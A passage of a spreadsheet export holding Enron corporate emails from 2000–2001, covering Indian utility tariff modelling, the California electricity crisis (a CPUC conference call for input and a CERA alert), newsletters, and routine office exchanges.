assumptions and assuming there is no state subsidy in 2006-07, MSEB should _x000D_
have a cash flow deficit of R34 Cr. in 2006-07 when Phase II comes on line _x000D_
for sale to MSEB, given a reasonable annual tariff increase.  (See the tariff _x000D_
sheet in gray shaded area.)  The annual rate increases would be15% for LT and _x000D_
HT agriculture and LT public water works, a 10% increase for domestic, street _x000D_
lights and interstate sales, a 4% increase for LT industrial and powerloom, _x000D_
and 1% increase for LT commercial and HT industrial, public water works and _x000D_
railways._x000D_
_x000D_
2. The annual tariff increases needed for MSEB to break even with a 3% _x000D_
profit, assuming industrial and commercial classes are held flat, are _x000D_
detailed below.  (See the Tariff sheet in red.) _x000D_
 _x000D_
 Domestic          8%_x000D_
 LT Public Water Works    35.60% _x000D_
 LT Agriculture and Poultry   26% _x000D_
 Street Light     10.8%_x000D_
 HT Agricultural &amp; Poultry    26.9%_x000D_
 Mula Pravara Electric Coop Soc.  24.30% _x000D_
 Interstate sales       6.5%_x000D_
_x000D_
It is obvious that  even the more realistic scenario would require strong _x000D_
MSEB, state government and regulator resolve._x000D_
_x000D_
In a separate e:mail I will describe the cost of service study we have also _x000D_
developed for MSEB.  _x000D_
---------------------- Forwarded by Jane Wilson/ENRON_DEVELOPMENT on _x000D_
02/06/2001 11:08 AM ---------------------------_x000D_
_x000D_
Heidi Hellmann_x000D_
_x000D_
02/06/2001 09:43 PM_x000D_
_x000D_
To: Jane Wilson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Ban Sharma/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Latest Model/Summary_x000D_
_x000D_
Jane,_x000D_
_x000D_
Attached is the latest summary (hard coded numbers, like I sent before) and _x000D_
the latest cashflow model in case that is required for anything._x000D_
_x000D_
Just to confirm all that has changed are the customer categories and the MU's _x000D_
in 1999-2000._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 04:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.trudeau@enron.com'})</t>
  </si>
  <si>
    <t>Re: EMERGENCY CONFERENCE REGARDING CALIFORNIA -- 10/21/2000 --_x000D_
 FINAL CALL FOR AGENDA ITEMS INPUT</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, Jim.  We'll monitor._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
From: James Trudeau on 09/13/2000 10:51 AM_x000D_
To: Douglas Huth/HOU/EES@EES, David Parquet/SF/ECT@ECT, Martin _x000D_
Wenzel/SFO/HOU/EES@EES, Jeff Dasovich/SFO/EES@EES, Susan J Mara/SFO/EES@EES_x000D_
cc: Ram Mukherji/HOU/EES@EES, David L Duffy/HOU/EES@EES, Tony _x000D_
Spruiell/HOU/EES@EES _x000D_
Subject: EMERGENCY CONFERENCE REGARDING CALIFORNIA -- 10/21/2000 -- FINAL _x000D_
CALL FOR AGENDA ITEMS INPUT_x000D_
_x000D_
I have worked closely with Anthony Mazy (Calif Public Utility Comm - Office _x000D_
of Ratepayer Advocates) in the past, and he asked me to provide input from _x000D_
Enron with our perspective on the energy mess in California for a conference _x000D_
they are putting together in October.  (Prior to joining EES I trained the _x000D_
CPUC ORA staff on a variety of issues and have earned their trust.)  However, _x000D_
I feel that the Enron input into this CPUC conference would be more _x000D_
appropriately provided by other members of the EES &amp; ENA team, so I wanted to _x000D_
pass this email along to you for your review and action as needed.  _x000D_
_x000D_
Let me know if my relationship with Anthony and other members of the CPUC _x000D_
staff could be useful in advancing Enron's positions at this conference._x000D_
_x000D_
Jim Trudeau_x000D_
Director, Power Quality Services_x000D_
(530) 518-9789_x000D_
_x000D_
---------------------- Forwarded by James Trudeau/SFO/EES on 09/13/2000 08:23 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Mazy, Anthony" &lt;am1@cpuc.ca.gov&gt; on 09/11/2000 11:38:08 PM_x000D_
To: _x000D_
cc: "'tonymazy@aol.com'" &lt;tonymazy@aol.com&gt; _x000D_
Subject: EMERGENCY CONFERENCE REGARDING CALIFORNIA -- 10/21/2000 -- FINAL _x000D_
CALL FOR AGENDA ITEMS INPUT_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
CONFERENCE:? " THE CALIFORNIA DISASTER: LESSONS LEARNED " _x000D_
??????????????????????????????????????????????????? (Working Title) _x000D_
_x000D_
DATE:????????????????????????????????? Saturday,? October 21, 2000 _x000D_
_x000D_
LOCATION:?????????????????????? University of California, Berkeley _x000D_
_x000D_
The CPUC Office of Ratepayer Advocates (ORA) together with the University of _x000D_
California is organizing a special conference, Saturday October 21, 2000, to _x000D_
address the current wholesale electricity market situation, as manifest in _x000D_
San Diego, and in light of both the economic framework and industrial _x000D_
realities in which utility restructuring is taking place._x000D_
_x000D_
We wish to emphasize the importance of maintaining consistent and predictable _x000D_
forward progress with the restructuring of the electric services industry, _x000D_
while remediating structural shortcomings as they appear.? The need for a _x000D_
quick and effective response to the cost escalation in California is urgent.? _x000D_
Meanwhile, we do not want to overlook emerging generation and information _x000D_
technologies and their appropriate role in an increasingly competitive energy _x000D_
and utility sector._x000D_
_x000D_
Your input is urgently requested to develop the detailed agenda for this _x000D_
workshop/conference.? We have had the opportunity to speak with some of you _x000D_
directly, and we appreciate your comments.? We are presently concluding _x000D_
negotiations with key national observers to be participants, and must _x000D_
complete the detailed agenda this week.? If you have any further topical _x000D_
insights to share with us, I must have your input no later than 4:00 p.m. _x000D_
Pacific time, Thursday, September 14.? (By 4:00 p.m., Wednesday, if at all _x000D_
possible.)_x000D_
_x000D_
Let me emphasize that today we are only concerned with conceptual, topical _x000D_
content, so please do not trouble yourselves with highly "stylized" _x000D_
presentations.?? Our immediate objective is to release a preliminary program, _x000D_
with a partial list of key participants, by Monday, September 18th, that we _x000D_
believe is likely to secure the active support of a wide range of industry _x000D_
stakeholders.? We plan to distribute a final program by Monday, September _x000D_
25th._x000D_
_x000D_
Please suggest topical areas that you can help develop, or believe are _x000D_
essential to the success of this program.? We will be particularly interested _x000D_
in your informed, practical insights into:_x000D_
_x000D_
the daily operations of the electric services industry, from various _x000D_
perspectives, that help clarify problems and distinguish truly problematic _x000D_
issues from those misunderstood,_x000D_
_x000D_
the political and legislative processes in California, as they may tend to _x000D_
suggest effective courses of action to promote short-term market _x000D_
accommodations that are consistent with, and constructive toward, long-term _x000D_
goals for industry restructuring,_x000D_
_x000D_
case studies from other jurisdictions that shed light on the probable _x000D_
response of California's institutions to any of the various proposed _x000D_
solutions currently circulating,_x000D_
_x000D_
case studies of anachronistic or otherwise inefficient industry practices _x000D_
impeding development, interconnection, or operation of distributed _x000D_
generation, or the sale or other transfer of the energy produced,_x000D_
_x000D_
case studies of market power abuse, or gaming, in both transmission and _x000D_
generation, _x000D_
_x000D_
proposals for innovative treatment of cost-effective emerging generation _x000D_
and/or information technologies, _x000D_
_x000D_
proposals for developing greater diversity of generation technologies and/or _x000D_
energy providers within the state, _x000D_
_x000D_
otherwise appropriate technical, economic, or regulatory principles and _x000D_
practices that are being misrepresented in the academic, trade, or popular _x000D_
press or other media, _x000D_
_x000D_
distinguishing informational difficulties or factual disagreements from _x000D_
policy conflicts or conflicts of interest, and _x000D_
_x000D_
specific suggestions for speakers who are particularly effective in _x000D_
addressing specific key issues or establishing confidence with the target _x000D_
audiences._x000D_
_x000D_
Attendance at this conference/workshop will be limited, with approximately _x000D_
one-half of the seats reserved for key policymakers and/or their aides, key _x000D_
agency staff, and the speakers.? The remaining seats will be allocated among _x000D_
interested consumer representatives, manufacturers, vendors, developers, and _x000D_
other end-users, and local government and community and business _x000D_
representatives.? We presently envision the conference to include one or two _x000D_
key speakers, with four panels of three to seven persons each addressing _x000D_
specific topics.? We are also reserving facilities for Friday evening to _x000D_
address topical seminars requested by decisionmakers and/or their key staff _x000D_
and additional facilities for Sunday morning when the information technology _x000D_
and distributed generation communities will be invited to provide additional _x000D_
follow-on to questions and comments offered by key policymakers on Saturday._x000D_
_x000D_
Some have commented that we should have started this as much as a year ago.? _x000D_
Unfortunately, a year ago we did not know that today we would have doubled _x000D_
and tripled consumer energy bills or a $250/MWH wholesale price cap, much _x000D_
less an intense, across-the-board attack on electric restructuring by some _x000D_
parties.? We are especially concerned about the efforts of some distribution _x000D_
utilities to establish a foothold in DG, the efforts of some utilities and _x000D_
the independent system operator to restrict distribution-level wheeling and _x000D_
the aggregation it would facilitate, and the latest proposal to reintegrate _x000D_
metering into the distribution utility after it was successfully unbundled _x000D_
for the benefit of competitive Energy Service Providers.? Likewise, language _x000D_
in recent legislation echoing regulatory arguments for retrenchment cannot be _x000D_
brushed aside.? _x000D_
_x000D_
We understand the difficulty of organizing such an event on less than two _x000D_
months notice, but we also appreciate the importance of the subject, as we _x000D_
are sure you do as well.? We are committed to preparing an event worthy of _x000D_
the time and attention of both key national observers and top-ranked _x000D_
California policymakers in the executive, legislative, and regulatory arenas, _x000D_
and we would welcome your active assistance.? _x000D_
_x000D_
If you have any questions, you are welcomed to call me, at 415-703-3036 from _x000D_
9:30 AM to 5:30 PM Pacific time.? For those with particularly busy schedules _x000D_
or time zone considerations, you are welcomed to call me at my personal _x000D_
telephone 925-855-0554 from 5:30 to 7:30 AM Pacific time._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 06:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michelle.cisneros@enron.com'})</t>
  </si>
  <si>
    <t>Materials Provided to California Governor</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Steven J Kean/NA/Enron on 01/08/2001 02:30 PM -----_x000D_
_x000D_
	Jeff Dasovich_x000D_
	Sent by: Jeff Dasovich_x000D_
	01/03/2001 08:08 PM_x000D_
		_x000D_
		 To: Jeff Dasovich/NA/Enron@Enron_x000D_
		 cc: Alan Comnes/PDX/ECT@ECT, Angela Schwarz/HOU/EES@EES, Beverly _x000D_
Aden/HOU/EES@EES, Bill Votaw/HOU/EES@EES, Brenda Barreda/HOU/EES@EES, Carol _x000D_
Moffett/HOU/EES@EES, Cathy Corbin/HOU/EES@EES, Chris H Foster/HOU/ECT@ECT, _x000D_
Christina Liscano/HOU/EES@EES, Christopher F Calger/PDX/ECT@ECT, Craig H _x000D_
Sutter/HOU/EES@EES, Dan Leff/HOU/EES@EES, Debora Whitehead/HOU/EES@EES, _x000D_
Dennis Benevides/HOU/EES@EES, Don Black/HOU/EES@EES, Donna _x000D_
Fulton/Corp/Enron@ENRON, Dorothy Youngblood/HOU/ECT@ECT, Douglas _x000D_
Huth/HOU/EES@EES, Edward Sacks/Corp/Enron@ENRON, Eric Melvin/HOU/EES@EES, _x000D_
Erika Dupre/HOU/EES@EES, Evan Hughes/HOU/EES@EES, Fran Deltoro/HOU/EES@EES, _x000D_
Frank W Vickers/HOU/ECT@ECT, Gayle W Muench/HOU/EES@EES, Ginger _x000D_
Dernehl/NA/Enron@ENRON, Gordon Savage/HOU/EES@EES, Harold G _x000D_
Buchanan/HOU/EES@EES, Harry Kingerski/NA/Enron@ENRON, Iris Waser/HOU/EES@EES, _x000D_
James D Steffes/NA/Enron@ENRON, James W Lewis/HOU/EES@EES, James _x000D_
Wright/Western Region/The Bentley Company@Exchange, Jeff Messina/HOU/EES@EES, _x000D_
Jeremy Blachman/HOU/EES@EES, Jess Hewitt/HOU/EES@EES, Joe _x000D_
Hartsoe/Corp/Enron@ENRON, Karen Denne/Corp/Enron@ENRON, Kathy _x000D_
Bass/HOU/EES@EES, Kathy Dodgen/HOU/EES@EES, Ken Gustafson/HOU/EES@EES, Kevin _x000D_
Hughes/HOU/EES@EES, Leasa Lopez/HOU/EES@EES, Leticia Botello/HOU/EES@EES, _x000D_
Mark S Muller/HOU/EES@EES, Marsha Suggs/HOU/EES@EES, Marty Sunde/HOU/EES@EES, _x000D_
Meredith M Eggleston/HOU/EES@EES, Michael Etringer/HOU/ECT@ECT, Michael _x000D_
Mann/HOU/EES@EES, Michelle D Cisneros/HOU/ECT@ECT, Mike D Smith/HOU/EES@EES, _x000D_
Mike M Smith/HOU/EES@EES, mpalmer@enron.com, Neil Bresnan/HOU/EES@EES, Neil _x000D_
Hong/HOU/EES@EES, Paul Kaufman/PDX/ECT@ECT, Paula Warren/HOU/EES@EES, Richard _x000D_
L Zdunkewicz/HOU/EES@EES, Richard Leibert/HOU/EES@EES, Richard _x000D_
Shapiro/NA/Enron@ENRON, Rita Hennessy/NA/Enron@ENRON, Robert _x000D_
Badeer/HOU/ECT@ECT, Roger Yang/SFO/EES@EES, Rosalinda Tijerina/HOU/EES@EES, _x000D_
Sandra McCubbin/NA/Enron@ENRON, Sarah Novosel/Corp/Enron@ENRON, Scott _x000D_
Gahn/HOU/EES@EES, Scott Stoness/HOU/EES@EES, Sharon Dick/HOU/EES@EES, _x000D_
skean@enron.com, Susan J Mara/NA/Enron@ENRON, Tanya Leslie/HOU/EES@EES, Tasha _x000D_
Lair/HOU/EES@EES, Ted Murphy/HOU/ECT@ECT, Terri Greenlee/NA/Enron@ENRON, Tim _x000D_
Belden/HOU/ECT@ECT, Tony Spruiell/HOU/EES@EES, Vicki Sharp/HOU/EES@EES, _x000D_
Vladimir Gorny/HOU/ECT@ECT, Wanda Curry/HOU/EES@EES, William S _x000D_
Bradford/HOU/ECT@ECT_x000D_
		 Subject: Materials Provided to California Governor_x000D_
_x000D_
Attached are the final versions of confidential materials provided to the _x000D_
Governor's office._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 08:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Do we have a call in #?</t>
  </si>
  <si>
    <t>Thanks,  Kay</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 06:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Welcome to www.har.com! (4)</t>
  </si>
  <si>
    <t xml:space="preserve">This area looks nice.  Maybe I will go look over there on Sunday!_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"K. Bass" &lt;daphneco64@bigplanet.com&gt; on 01/25/2001 08:11:50 AM_x000D_
Please respond to "K. Bass" &lt;daphneco64@bigplanet.com&gt;_x000D_
To: Eric Bass &lt;Eric.Bass@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Welcome to www.har.com! (4)_x000D_
_x000D_
_x000D_
_x000D_
these are higher priced but sound wonderful.?  lots of them.? maybe you could _x000D_
make a deal.? great  location._x000D_
_x000D_
?http://www.har.com/search/condo/indexdetail.cfm?MLNUM=537096_x000D_
 - Welcome to www.har.com! (4).url_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 08:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Alliance Bid Sheet</t>
  </si>
  <si>
    <t xml:space="preserve">Fletch... attached is the bid sheet that I put together to keep track of all _x000D_
your sporadic pricing initiatives._x000D_
_x000D_
If the format is OK please complete and resend to me with your view on _x000D_
current prices.  _x000D_
_x000D_
BT </t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 08:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Omnibus Forms</t>
  </si>
  <si>
    <t>It seems to me that in our omnibus forms, there is no rounding rule _x000D_
applicable to the return of collateral.  However, credit worksheets often ask _x000D_
for the rounding rule to apply to both delivery and return (similar to _x000D_
master).  Could you look at the forms at your convenience and let me know if _x000D_
I am missing something?  If not, I will ask Mark if he thinks we should _x000D_
revise.  Thanks.  Mary</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 09:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EMAZING Health &amp; Fitness Tip of the Day - The Sun Never Sets On_x000D_
 Hydration</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Health &amp; Fitness Tip of the Day_x000D_
=09=09Monday November 13, 2000_x000D_
=09=09_x000D_
=09=09The Sun Never Sets On Hydration =20_x000D_
=09=09_x000D_
=09=09It's easy to overlook your hydration needs once summer's heat stops=_x000D_
=20_x000D_
antagonizing your workout. But don't be fooled into believing that you need=_x000D_
=20_x000D_
much less water in cooler temperatures. Everyone's need for water varies,=_x000D_
=20_x000D_
depending upon what you eat and how much you sweat, but a general rule is t=_x000D_
o=20_x000D_
drink a quart of water for every hour of exercise you do. And of course,=20_x000D_
that's in addition to the eight glasses you're already drinking daily._x000D_
=09=09_x000D_
=09=09- Mariam Ballantine_x000D_
=09=09_x000D_
=09=09Email  this tip to a friend - Browse  the Archives_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09 HEALTH BOOK OF THE DAY_x000D_
=09=09David Schrieberg: Eat, Drink, and Be Merry_x000D_
=09=09_x000D_
=09=09Bush vs. Gore:  the cam-pain continues._x000D_
=09=09Seek relief on the inDecision2000 'Vine._x000D_
=09=09_x000D_
=09=09Got something to say?_x000D_
=09=09Hello...I love you...Congratulations...Thinking of you...Happy birthd=_x000D_
ay.=20_x000D_
Whatever you wanna say, let Emazing's e-greetings say it for you! We have=_x000D_
=20_x000D_
hundreds of the coolest greetings around. They're fun, FREE, and easy to=20_x000D_
send. Click here for more information._x000D_
=09=09_x000D_
=09=092000 Ford Taurus, yellow and black, 600HP V8, 5 speed, No AC, No AM/F=_x000D_
M._x000D_
=09=09Sign-up today for your FREE subscription to EMAZING.com's Auto Racing=_x000D_
=20_x000D_
Daybreaker and you could win Matt Kenseth's NASCAR Winston Cup racecar._x000D_
=09=09_x000D_
=09=09Our e-greetings aren't turkeys..._x000D_
=09=09But we have plenty with turkeys on them to celebrate your holiday=20_x000D_
get-togethers and feasts!_x000D_
=09=09_x000D_
=09=09     QUOTE OF THE DAY_x000D_
=09=09Every man has his follies, and often they are the most interesting th=_x000D_
ings he=20_x000D_
has got._x000D_
=09=09- Josh Billings_x000D_
=09=09_x000D_
=09=09 [IMAGE]_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09  You've made your decision._x000D_
=09=09While you wait for the rest of the country to catch up, check out inD=_x000D_
ecision=20_x000D_
2000 on the Grapevine.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ue, 3 Jul 2001 07:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dave.perrino@enron.com', 'sarah.novosel@enron.com', 'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'steve.walton@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'christi.nicolay@enron.com', 'susan.mara@enron.com', 'donna.fulton@enron.com'})</t>
  </si>
  <si>
    <t>RE: June 19 Rehearing/Clarification Ideas</t>
  </si>
  <si>
    <t xml:space="preserve">Per today's call, I added a couple of issues.  GAC_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 09:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'keller.mayeaux@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Larry F Campbell/NA/Enron on 09/05/2000 _x000D_
04:45 PM ---------------------------_x000D_
_x000D_
_x000D_
Larry F Campbell_x000D_
09/05/2000 04:30 PM_x000D_
To: Keller Mayeaux/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
http://www.vegasinsider.com/u/football/college/2000returnees.htm_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 13:43:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>Going home to clean my house.  Did you get in trouble last night?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 31, 2001 3:43 PM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
just going home, you?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 31, 2001 3:41 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
5:00...what are you doing tonight?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Thursday, May 31, 2001 3:41 PM_x000D_
To:	Huble, Amanda_x000D_
Subject:	RE: _x000D_
_x000D_
5:00 you?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Huble, Amanda  _x000D_
Sent:	Thursday, May 31, 2001 2:56 PM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
What time are you leaving today?_x000D_
_x000D_
Amanda K. Huble _x000D_
Gas Fundamentals _x000D_
Phone: (713) 853-4384_x000D_
Pager: (877) 482-0772_x000D_
Fax: (713) 646-8453</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 12:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>California on the Brink--CERA Alert</t>
  </si>
  <si>
    <t xml:space="preserve">CERA Alert: December 13, 2000 _x000D_
_x000D_
Title: California on the Brink _x000D_
CERA Knowledge Areas: Western Energy, N. American Power, N. American Gas _x000D_
_x000D_
CALIFORNIA ON THE BRINK _x000D_
The California Stalemate _x000D_
California moved closer to the brink of an outage today as concerns over _x000D_
credit-worthiness of buyers brought the possibility that generators would _x000D_
avoid selling to the California market. While numerous factors have _x000D_
contributed to the high cost of power incurred by California's utilities, the _x000D_
root cause of the current crisis is a lack of new generation. The current _x000D_
credit crisis and its threat to supplies could spark state action to address _x000D_
the situation. The collective efforts of all market participants should be _x000D_
focused on increasing generation capacity as quickly as possible._x000D_
_x000D_
Western power prices have skyrocketed well beyond the record levels set this _x000D_
summer. Perhaps because frozen rates insulate the majority of California _x000D_
consumers and companies from tangible effects of the market crisis, _x000D_
regulators have been able to postpone meaningful market reforms and _x000D_
significant rate increases. The California Public Utilities Commission denied _x000D_
the requests of Pacific Gas &amp; Electric and Southern California Edison to end _x000D_
their rate freezes, forcing these utilities at least temporarily to finance _x000D_
the costs of higher wholesale energy. This has created an unsustainable _x000D_
accumulation of costs and a loss of faith in the California market. _x000D_
_x000D_
The current credit crisis and the potential for blackouts may become the _x000D_
galvanizing events that provide state regulators with a public mandate to _x000D_
address the underlying structural problems in the industry. However, there is _x000D_
no guarantee that these regulatory actions will expedite an effective _x000D_
solution for customers and the industry as a whole. Wholesale and retail _x000D_
markets that emerge from regulatory intervention are likely to remain _x000D_
muddled. In the necessarily political process that will follow, it is _x000D_
possible that-as has largely been the case so far-the steps taken will fail _x000D_
to move the California power market toward a more enduring solution and will _x000D_
instead continue to mask the underlying structural flaws. _x000D_
_x000D_
In the six months since California's supply shortfall began plaguing Western _x000D_
markets, regulators have done little to address the underlying problem. _x000D_
Rather than addressing the cause of the supply shortage-establishing a market _x000D_
environment that encourages timely additions of new generating capacity and _x000D_
demand side responses-efforts are instead directed at trying to lay blame for _x000D_
the crisis and lessen the immediate financial impact on customers. Indeed, _x000D_
several actions taken thus far have served more to compound the problem by _x000D_
discouraging new power plant additions. These include price caps, repeated _x000D_
changes to market rules, attempts to seize generator profits, and a _x000D_
challenging siting and permitting process._x000D_
_x000D_
Medicine Worse than the Illness _x000D_
Several years of electricity demand growth and low prices in California were _x000D_
accompanied by very few additions to the supply base. Regulators did not pay _x000D_
adequate attention to the looming supply shortfall. The void of consensus _x000D_
over the cause of the current crisis has instead been replaced by a series of _x000D_
bandaid remedies that address the symptoms, but not the cause, of _x000D_
California's electric market woes.* _x000D_
_x000D_
* Challenging siting and permitting. Despite state action to better _x000D_
coordinate the siting and permitting process for new power plants, power _x000D_
plant developers still face high hurdles. Local community opposition alone _x000D_
has struck down some key proposed facilities._x000D_
_x000D_
* Price caps discourage investment. State and federal proposals to cap prices _x000D_
limit the attractiveness of the California wholesale power market, especially _x000D_
for developers who have the option of channeling scarce capital and equipment _x000D_
to more stable or more attractive markets outside the state. _x000D_
_x000D_
* Repeated rule changes. Frequent rule changes in the ISO markets (including _x000D_
the price caps) confound attempts by developers to estimate profits from new _x000D_
plant development._x000D_
_x000D_
* Calls for refunds. Despite reports by the Power Exchange, the ISO, and the _x000D_
FERC that no pattern of abuse could be found from their examination of the _x000D_
California markets, state officials continue to accuse power providers of _x000D_
gaming the market. Calls by state officials for refunds of generator profits _x000D_
are a threat to new plant development._x000D_
_x000D_
* Facility inspections. Recent inspections of power plants by state officials _x000D_
to verify that operators are honestly reporting the operational status of _x000D_
their generating units accentuates the atmosphere of mistrust._x000D_
_x000D_
CERA's recent analysis suggests that merchant plant developers in the West _x000D_
are not guaranteed? to make a profit. Prospects of new plant profitability _x000D_
are affected by the timing and quantity of new plants, decommissioning of _x000D_
older units, demand growth, and numerous other difficult-to-forecast factors. _x000D_
California's regulatory actions only further cloud the assessment of _x000D_
financial viability and degrade the political environment for developers _x000D_
considering entering the state. _x000D_
_x000D_
Despite efforts by the California ISO to stimulate new capacity additions in _x000D_
the state with a special, limited-term capacity payment, CERA estimates that _x000D_
demand growth will continue to outstrip supply additions in the West in 2001. _x000D_
In addition, the existing siting and permitting process will prevent a _x000D_
sufficient quantity of capacity from entering the market until 2003 at the _x000D_
earliest. Therefore, three years remain before a sufficient quantity of _x000D_
capacity enters service to significantly dampen prices and decrease the risk _x000D_
of an outage. _x000D_
_x000D_
The Road to Recovery _x000D_
There are a number of actions that can be taken to help relieve the capacity _x000D_
shortfall: _x000D_
_x000D_
* Encourage new build. Supply must be part of the answer. This requires a _x000D_
series of steps that can help facilitate new supply build. While in principal _x000D_
some have been taken, such as new fast track approval, the success of these _x000D_
actions can only be measured by the build itself. For now, there is still not _x000D_
enough new supply coming on until 2003 to relieve supply tightness.? _x000D_
_x000D_
* Stabilize investment climate. Utilities must have assurance that they will _x000D_
ultimately be allowed to recover market costs for power. This provides the _x000D_
credit worthiness needed by sellers to produce energy and to stimulate new _x000D_
build._x000D_
_x000D_
* Move toward more balanced utility supply portfolios. One of the reasons the _x000D_
pressure on customers has been so intense in California has been the absence _x000D_
(and even discouragement) of diverse supply portfolios among the utilities in _x000D_
the state-particularly for residential and small commercial customers. With _x000D_
the market at a peak, however, now is in one sense a sub-optimal time to move _x000D_
toward term contracting. Yet these contracts provide the foundation for a _x000D_
series of actions-including new supply build and demand side investments. If _x000D_
they end up above market, they will at least have achieved the desired effect _x000D_
of knocking down prices, a fact which by itself should provide sufficient _x000D_
justification for recovering the cost of these commitments._x000D_
_x000D_
* Encourage market mechanisms that elicit a demand response. Although _x000D_
originally a feature of California's market design, most consumers are _x000D_
insulated from price spikes through capped or frozen retail rates. Exposing _x000D_
customers to at least some of the market price signals would encourage a _x000D_
demand response._x000D_
_x000D_
* Encourage market mechanisms that dampen the "Boom Bust" characteristic of _x000D_
the market. Whether in the form of a capacity payment, a reserve requirement, _x000D_
or a minimum term portfolio requirement, the California power market needs to _x000D_
move to a structure that encourages investment in new capacity when the _x000D_
market is in balance rather than waiting for a shortage and price shock to _x000D_
elicit new investment. Such a structure can help dampen (but not eliminate) _x000D_
future price volatility._x000D_
_x000D_
* Avoid continuously tinkering with the market. While the market does need to _x000D_
be restructured as described above, it also needs to be stable and reliable _x000D_
to encourage the development of new supply as well as a robust long-term _x000D_
contractual market for power in California. Continually tinkering with the _x000D_
market structure-such as the three times the price cap has been shifted since _x000D_
July-only serves to undermine confidence in the market. California needs to _x000D_
do its best to develop a long-term solution and then let the market run its _x000D_
course. _x000D_
_x000D_
* Allow for greater environmental flexibility. The state should explore a _x000D_
more balanced solution to emissions restrictions in the face of a supply _x000D_
shortfall that has been exacerbated by generators that cannot operate due to _x000D_
emissions restrictions. _x000D_
_x000D_
* Free PURPA power plants to generate. Relief should be granted to PURPA _x000D_
power plants that are operational, but are restricted by contract from _x000D_
operating to generate only power. _x000D_
_x000D_
**end** _x000D_
_x000D_
This CERA Alert will be available in PDF format within 24 hours. _x000D_
_x000D_
**********************************************************************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 _x000D_
_x000D_
Terms of Use: http://www.cera.com/tos.html _x000D_
Questions/Comments: webmaster@cera.com _x000D_
Copyright 2000. Cambridge Energy Research Associates </t>
  </si>
  <si>
    <t>Mon, 25 Jun 2001 10:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jwright@s-k-w.com'})</t>
  </si>
  <si>
    <t>frozenset({'lga@mother.com', 'drothrock@camfg.com', 'wbooth@booth-law.com', 'brbarkovich@earthlink.net', 'fieldejr@sce.com', 'vjw@cleanpower.org', 'cra@calretailers.com', 'derek.naten@roche.com', 'isenberg@hmot.com', 'kmccrea@sablaw.com', 'dhunter@s-k-w.com', 'dominic.dimare@calchamber.com', 'jredding@aol.com', 'jstewart@cmta.net', 'smutny@iepa.com', 'mkahl@ka-pow.com', 'ek@a-klaw.com', 'mdjoseph@adamsbroadwell.com', 'kt@a-klaw.com', 'cohnap@sce.com', 'jdasovic@enron.com', 'djsmith@s-k-w.com', 'debinorton@aol.com'})</t>
  </si>
  <si>
    <t>MEETING TIME/INFO</t>
  </si>
  <si>
    <t>Julia B. Wright_x000D_
Executive Assistant_x000D_
Smith, Kempton &amp; Watts_x000D_
980 Ninth Street, Suite 1560_x000D_
Sacramento, CA 95814_x000D_
(916)446-5508_x000D_
(916)446-1499 Fax_x000D_
jwright@s-k-w.com_x000D_
_x000D_
D.J. Smith_x000D_
President_x000D_
Smith, Kempton &amp; Watts_x000D_
980 Ninth Street, Suite 1560_x000D_
Sacramento, CA 95814_x000D_
(916)446-5508_x000D_
(916)446-1499 Fax_x000D_
djsmith@s-k-w.com_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Lenny Goldberg [mailto:lga@mother.com]_x000D_
Sent: Monday, June 25, 2001 12:26 PM_x000D_
To: dhunter@s-k-w.com; 'Evelyn Kahl'; 'Keith McCrea'; 'Mike Kahl'; 'Jeff_x000D_
